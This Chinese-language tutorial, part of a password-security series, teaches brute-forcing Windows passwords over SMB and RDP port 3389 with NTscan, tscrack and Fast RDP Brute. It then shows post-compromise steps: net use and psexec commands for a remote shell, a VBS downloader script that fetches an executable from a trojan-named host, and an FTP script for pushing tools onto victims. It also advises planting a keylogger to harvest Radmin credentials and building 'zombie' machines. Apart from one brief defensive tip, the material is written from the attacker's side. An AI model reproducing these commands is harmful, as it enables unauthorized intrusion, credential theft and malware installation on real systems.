密碼安全系列文章7：Windows口令掃描及3389口令暴力破解

radmin有手機版嗎

在Windows作業系統滲透過程中，除了SQL注入、Web服務漏洞攻擊等方式外，還有一種攻擊方式，即暴力破解，對3389或者內網的伺服器進行口令掃描攻擊，以獲取更多的伺服器許可權。這種攻擊尤其是在擁有一臺或者多臺伺服器許可權後，目前口令掃描有Hscan、NTscan等，本章主要介紹如何進行口令掃描以及利用tscrack、Fast RDP Brute等工具軟體來暴力破解3389口令，最終獲取伺服器許可權。

7。1口令掃描準備工作

在進行口令掃描前需要做一些準備工作，收集資訊越多，越有可能成功獲取內網伺服器許可權。例如掌握一定許可權後，透過郵箱帳號等資訊，進行社工密碼收集，對使用者的密碼進行規律分析和社工字典生成。

1。確定需要掃描的IP地址或者IP地址段

2。收集使用者名稱和密碼，常見的是Administrator為使用者較多，但在內網中，很多使用者都喜歡使用個性化名字進行登入，因此需要收集一些使用者名稱；密碼字典的整理尤其重要，可以包含網站使用過的密碼，社工庫郵件地址或者使用者名稱查詢到的密碼，公司名稱，電話號碼，出生日期，手機號碼，QQ號碼等。

3。編輯密碼和口令配置檔案

7。2使用NTScan掃描口令例項

Windows口令掃描攻擊主要針對某一個IP地址或者某一個網段進口令掃描，實質是透過139、445等埠來嘗試建立連線，其利用的是Dos命令“net use \\ipaddress\admin$ “password” /u：user”，只不過透過程式來實現而已。下面的案例透過掃描軟體NTScan來掃描口令，掃描出口令後成功實施控制的案例。

1。設定NTScan

直接執行NTscan，在NTscan中一般只需要設定開始IP和結束IP兩個地方，其它設定均可以採取預設，如圖1所示。

圖1 設定NTscan

&說明

①如果是在肉雞上面精細管理掃描，由於語言版本的不同，如果作業系統不支援中文顯示，就有可能顯示為亂碼，這個時候設定就只能憑熟悉度來進行設定，在本例中是在英文作業系統中使用NTscan，在其執行介面中一些漢字顯示為“？”，但是不影響掃描使用，如圖2所示。

圖2 NTscan亂碼顯示

②在NTscan中有IPC、SMB和WMI三種掃描方式，第一種和第三種方式掃描口令較為有效，第二種主要用來掃描共享檔案。利用IPC$可以與目標主機建立一個空的連線而無需使用者名稱與密碼，而且還可以得到目標主機上的使用者列表。SMB（伺服器資訊塊）協議是一種IBM協議，用於在計算機間共享檔案、印表機、串列埠等。SMB 協議可以用在因特網的TCP/IP協議之上，也可以用在其它網路協議如IPX和NetBEUI 之上。

③WMI（Windows管理規範）是一項核心的Windows管理技術，WMI作為一種規範和基礎結構，透過它可以訪問、配置、管理和監視幾乎所有的Windows資源，比如使用者可以在遠端計算機器上啟動一個程序；設定一個在特定日期和時間執行的程序；遠端啟動計算機；獲得本地或遠端計算機的已安裝程式列表；查詢本地或遠端計算機的Windows事件日誌等等。一般情況下，在本地計算機上執行的WMI操作也可以在遠端計算機上執行，只要使用者擁有該計算機的管理員許可權。如果使用者對遠端計算機擁有許可權並且遠端計算機支援遠端訪問，那麼使用者就可以連線到該遠端計算機並執行擁有相應許可權的操作。

2。執行掃描

在NTscan執行介面中單擊“開始”按鈕或者單擊左視窗下面的第一按鈕（如果顯示為亂碼），開始掃描，如圖3所示。

圖3 掃描口令

&說明

①NTscan掃描口令跟字典有關，其原理就是使用字典中的口令跟實際口令進行對比，如果相同即可建立連線，即破解成功，破解成功後會在下方顯示。

②NTscan的字典檔案為NT_pass。dic，使用者檔案為NT_user。dic，可以根據實際情況對字典檔案和使用者檔案內容進行修改。

③NTscan掃描結束後，會在NTscan程式當前目錄下生成一個NTscan。txt檔案，該檔案記錄掃描結果，如圖4所示。

圖4 NTscan掃描記錄檔案

④在NTscan中還有一些輔助功能，例如右鍵單擊後可以執行“cmd”命令，左鍵單擊後可以執行“連線”、“開啟遠端登陸”以及“對映網路驅動器”等命令，如圖5所示。

圖5NTscan輔助功能

3。實施控制

在Dos命令提示符下輸入“net use \\221。*。*。*\admin$ “mrs6100” /u：administrator”命令獲取主機的管理員許可權。命令執行成功，如圖6所示。

4。執行Psexec命令

輸入“psexec

\\221。*。*。*

cmd”命令獲取一個DosShell，如圖7所示。

圖7獲取DosShell

&說明

①以上兩步可以合併，直接在Dos命令提示符下輸入“psexec

\\ipaddress

–u administrator －ppassword cmd”。例如在上例中可以輸入“psexec

\\221。*。*。*

-u Administrator –pmrs6100 cmd”命令來獲取一個Dos下的Shell。

②在有些情況下使用“psexec

\\ipaddress

–u administrator －ppassword cmd”命令不能正常執行。

5。從遠端檢視被入侵計算機埠開放情況

使用“sfind –p 221。*。*。*”命令檢視遠端主機埠開放情況，該主機僅僅開放了4899埠，如圖8所示。

圖8檢視埠開放情況

6。上傳檔案

在該DosShell下執行檔案下載命令，將一些工具軟體或者木馬軟體上傳的被攻擊計算機上面，如圖9所示。

圖9 上傳檔案

&說明

①可以使用以下vbs指令碼命令來上傳檔案。

echo with wscript：if 。arguments。count^<2 then 。quit：end if >dl。vbe

echo set aso=。createobject（“adodb。stream”）：set web=createobject（“microsoft。xmlhttp”） >>dl。vbe

echo web。open “get”，。arguments（0），0：web。send：if web。status^>200 then quit >>dl。vbe

echo aso。type=1：aso。open：aso。write web。responsebody：aso。savetofile 。arguments（1），2：end with >>dl。vbe

cscript dl。vbe http：//www。mymuma。com/software/systeminfo。exe systeminfo。exe

②如果不能透過執行vbs指令碼來上傳檔案，則可以透過執行ftp命令來上傳檔案，ftp命令如下：

echo open 192。168。1。1 >b

echo ftp>>b

echo bin>>b

echo get systeminfo。exe >>b

echo bye >>b

ftp -s：b

7。並檢視主機基本資訊

執行“systeminfo info”可以檢視被入侵計算機的基本資訊，該計算機作業系統為Windows 2000 Professional，如圖10所示

圖10 檢視主機基本資訊

8。進行滲透

在本案例中，由於對方計算機安裝有Radmin，因此極有可能保留有Radmin的控制資訊，透過“開始”-“程式”-“Remote Administrator v2。2”-“Remote Administrator viewer”開啟Radmin2。0版本的客戶端控制器，在其中有兩個IP地址，如圖11所示，不過不知道連線密碼，安裝一個鍵盤記錄，等待使用者自己連線，監聽使用者的鍵盤記錄，到時候就可以將使用者的控制端作為肉雞，這種肉雞質量很高。

圖11 獲取Radmin控制端資訊

9.小結

本案例透過NTscan掃描工具軟體掃描主機口令，配合psexec等命令成功控制控制掃描出弱口令的計算機，其實在本案例中，該口令並不算弱口令，將被控制計算機的口令作為掃描口令，有時候會控制一大片計算機作為好肉雞。

7。3使用tscrack掃描3389口令

3389終端攻擊主要透過3389破解登陸器（tscrack）來實現的，tscrack是微軟開發遠端終端服務（3389）的測試產品，後面有人將其做了一些修改，可以用來破解3389口令；其核心原理就是利用字典配合遠端終端登陸器進行嘗試登陸，一旦登陸成功則認為破解成功。破解成功主要取決於字典強度和時間長度，在成功進入內網後，藉助該方法可以對內網3389伺服器進行滲透，該方法對Windows 2000 Server攻擊效果較佳。

1。安裝Tscrack軟體

tscrack初次執行時需要進行安裝，即直接執行tscrack。exe程式即可，如果不能正常執行則需要執行“tscrack -U”命令解除安裝tscrack中的元件以後再次執行tscrack。exe即可。執行成功後，會提示安裝元件、解壓縮元件、註冊元件成功，如圖12所示。

圖12 安裝tscrack程式

2。尋找開放3389的IP地址

在Dos提示符下輸入“sfind –p 220。*。*。*”，探測其埠開放情況，如圖13所示。

圖13 探測3389埠

3。構建字典檔案

構建字典檔案100words。txt，在100words。txt檔案中加入破解口令，每一個口令佔用獨立的一行，且行尾無空格，編輯完成後，如圖14所示。

圖14構建字典檔案

4。編輯破解命令

如果僅僅是對單個IP地址進行破解，其破解命令格式為“tscrack ip –w 100words。txt”，如果是對多個ip地址進行破解，則可以將ip地址整理成一個檔案，每一個ip地址佔一行，且行尾無空格，將其儲存為ip。txt，然後可以編輯一個批命令，如圖15所示。

圖15 編輯破解命令

說明

（1）在原程式tscrack。exe可以更改為任意名稱，100words。txt也可以是任意名稱。

（2）如果是對多個IP地址進行破解，則字典檔案不能太大，否則破解時間會很長，建議是針對單一的IP地址進行破解。

5。破解3389口令

執行批命令後，遠端終端破解程式開始破解，tscrack會使用字典的口令一個一個的進行嘗試登陸，只是程式自動輸入密碼，如圖16所示，在程式破解過程中不要進行手動干涉，讓程式自動進行破解。

圖16破解口令

6。破解成功

當破解成功後，程式會自動結束，顯示破解的口令和破解該口令所花費的時間，如圖17所示。

圖17 破解口令成功

說明

（1）Tscrack破解3389終埠令後不會生成log檔案，破解的口令顯示在Dos視窗，一旦Dos視窗關閉，所有結果都不會儲存。

（2）如果是對多個IP地址進行3389終埠令破解，Tscrack程式會將所有IP地址都進行破解嘗試後才會停止。

（3）Tscrack破解3389終埠令相對應的使用者只能是Administrator，對其它使用者無能為力。

7。使用口令和使用者登陸

執行mstsc。exe開啟終端聯結器，輸入IP地址進行連線，在3389連線介面中輸入剛才破解的密碼和Administrator使用者，連線成功，如圖18所示。

圖18進入遠端終端桌面

8.小結

本案例透過tscrack程式來破解遠端終端（3389）的口令，只要字典足夠強大以及時間足夠，如果對方未採取IP地址登陸限制等安全措施，則其口令在理論上是可以破解的，不過在微軟升級補丁後該方法僅對Window 2000 Server效果較好，對Windows 2003以及以上版本效果不佳。應對3389遠端終埠令破解的安全措施是進行IP地址信任連線，或者透過一些軟體來限制只有某一些IP地址才能訪問遠端終端。

7。5使用Fast RDP Brute暴力破解3389口令

1。軟體簡介

Fast RDP Brute 是俄羅斯Roleg開發的一款暴力破解工具，主要用於掃描遠端桌面連線弱口令的工具。官方網站下載地址http：//stascorp。com/load/1-1-0-58，執行軟體後介面如圖19所示。

圖19程式主介面

2。設定主要引數

（1）Max threads：設定掃描執行緒數，預設為1000，一般不用修改。

（2）Scan timeout：設定超時時間，預設為2000，一般不用修改。

（3）Thread timeout：設定執行緒超時時間，預設為60000，一般不用修改。

（4）Scan ports：設定要掃描的埠，根據實際情況設定，預設為3389，3390和3391，在實際掃描過程中如果是對某一個已知IP和埠進行掃描，建議刪除多於埠，例如對方埠為3388，則只保留3388即可。

（5）Ip ranges to scan：設定掃描的ip範圍

（6）使用者名稱和密碼可以在資料夾下的user。txt和pass。txt檔案內自行設定。如圖20所示，在預設的user。txt中包含俄文的管理員，一般用不上，可以根據實際情況進行設定。

圖20設定暴力破解的使用者名稱和密碼字典

3。區域網掃描測試

本次測試採用Vmware，搭建了兩個平臺，掃描主機IP地址為“192。168。148。128”；被掃描主機IP為“192。168。148。132”，作業系統為Win2003，開放3389埠，在該伺服器上新建立test、antian365使用者，並將設定的密碼複製到掃描字典中，單擊“start scan”進行掃描，掃描結果如圖21所示。

注意：

（1）在192。168。148。132伺服器上必須開啟3389。

（2）在掃描伺服器上執行mstsc命令，輸入IP地址192。168。148。132進行3389登入測試，看看能否訪問網路，如果無法訪問網路，則掃描就無效。